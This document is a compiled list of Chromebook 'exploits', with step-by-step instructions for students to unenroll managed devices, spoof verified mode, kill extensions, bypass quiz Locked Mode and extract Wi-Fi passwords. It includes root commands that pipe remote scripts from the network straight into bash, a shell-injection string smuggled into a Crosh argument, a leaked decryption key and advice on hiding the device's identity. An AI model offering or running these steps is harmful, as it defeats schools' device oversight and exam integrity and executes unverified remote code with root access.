B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".

3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.


Any OS RecoveryMode Kernel Version Switcher

Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.

1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.


Any Web Locked Mode X

Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.


1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.

Note you can't screenshot until the form has been submitted.


Any OS DevMode Murkmod

Requires Dev Mode
Spoofs Secure Mode with Dev Mode privileges. Continuation of Fakemurk.
OS-based exploit.


1: Enter Dev Mode (Esc+Power+Refresh; Ctrl+D) & the VT2 shell (Ctrl+Alt+F2).
2: Log in as root & run "bash <(curl -SLk https://bit.ly/murkmod)".
3: Install the helper extension (unzip the "helper" folder & load unpacked).

For more installation methods, see here.


Any OS chrome://flags NCOCrOS

Requires chrome://flags
Allows you to update your web browser separate from Chrome OS.
OS-based exploit.


1: Go to chrome://flags#lacros & enable it.
2: Restart your Chromebook.


Any OS Powerwash Revertion

Requires powerwash
Reverts Chrome OS back to its previous version.
Chrome OS-based exploit.


1: Powerwash your Chromebook.
2: On the OOBE screen, press Ctrl+Shift+Alt+R twice.
3: Click "Powerwash & Revert".


Any Web Search Filter Bypass

doesn't do shit
Works around the set blocked pages.
Web-based "exploit".


1: Type what you want to search in the address bar & add enough bullshit, then press enter.


Any OS;Unenrollment ExternalStorageDevice SH1MMER

Requires a storage device; patched on kernver 4+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web, download an injected bin from here, or build one yourself.
Modern shims have a UI, while Legacy uses a commandline interface.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: On Legacy shims, play some Tetris. This is legally required.
9: Use the Cryptosmite payload, this is "S" on Legacy. The decryption key is "Info-58-immense!NickName_Arabia-710" on older Legacy shims.
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

Reenrollment:
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Once you're done, reboot your computer with Power+Refresh, then reunenroll.


Any OS DevMode;ExternalStorageDevice Shimboot

Requires a storage device, Dev Mode; patched on keyrolled devices
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Chrome OS-based exploit.

1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one from here.

A: Clone this repository.

B: Run "mkdir -p data/rootfs", "sudo ./build_rootfs.sh data/rootfs bookworm", "sudo ./patch_rootfs.sh path_to_shim path_to_reco data/rootfs", & "sudo ./build.sh image.bin path_to_shim data/rootfs".

3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.


Any Web ExtensionCodeExecution;chrome://flags Sh0vel

Requires code execution in extensions, chrome://flags access
Unblocks bookmarklets.
Web-based exploit.


1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.


Any Web DevMode;ExtensionDevMode Skebstore

Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.

1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.


Any Web Snap&Read Snap&Run

Snap&Read exclusive
Unblocks bookmarklets.
Web-based exploit.


1: Sign in to an active account.

Setup:

2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.

-Be sure to add this bookmarklet executor.

9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.

Execution:

11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parentheses that contains the bookmarklet.
13: Click the "Hide Outlines" button.


Any Web SourceCode Source View

Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".


1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.


Any Web Sync Internals Password Extractor

Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.

1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button, it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).


Any Web Crosh;ExtensionDevMode Tr3nch

Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.


1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.

Loading the Tr3nch Menu:

1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://settings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.


Any Web uBlockOrigin uBlock Run

uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.


1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).

The only reason to use this is for Securely-Kill.


Any OS DevMode;ExternalStorageDevice USBoot

Requires Dev Mode, external storage device
Allows you to boot from an external storage device. See Shimboot for booting Linux from an external storage device.

1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Type "sudo crossystem dev_boot_usb=1". Note that if the GBB flag that ignores this is set you can skip this step.

Press "Ctrl+U" on the OS Verification screen to boot from USB.


Any Web uBlockOrigin uRun

uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.

1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).

Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.


Any Web chrome://net-export;chrome://network;chrome://policy Policy Password Tool

Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.

1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.


Any Priism

N/A
Recovery image/shim manager.
Chrome OS-based tool.


1: Build or download a prebuilt image, then flash & boot it.
It is recommended to use Priishimbooter for Shimboot.



Crosh

Any Crosh;DevMode CroshFi

Requires Dev Mode
Gives you the password to a Wi-Fi network.


1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr '!-~' 'P-~!-O'".


100 Crosh De-roll

Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.


Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".


116 Crosh;DevMode;RecoveryMode Fakemurk

Requires Dev Mode; patched on version 117+
Allows you to have Dev Mode permissions while in Safe Mode. Succeeded by Murkmod.


1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
5: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.

If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then space on the OS Verification screen. You will be on a “Chrome OS is missing or damaged” screen. Enter Dev Mode & when you get back to the OS verification screen press Ctrl+D to boot.

Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.


Any Crosh K1LL3R SP1D3R

Requires Chronos access
Kills all extensions.


1: Run "while true; do kill -9 $(pgrep -f "\-\-extension\-process"); done".


Any Crosh;Powerwash OP Crosh

Requires powerwash
Deletes the extensions.


1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run “vmc create-extra-disk --size 1 /home/chronos/user/Extensions” to disable all.
5: Reenable Wi-Fi.


130 Crosh;DevMode Pollen

Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.


1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.

A: If the policy doesn’t apply, press Alt+Vol Up+X.

3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".


Created by The Wagonization, consisting of JackWagon885
All credit goes to the respective owners. I only compile them in a list.
Fuck you Google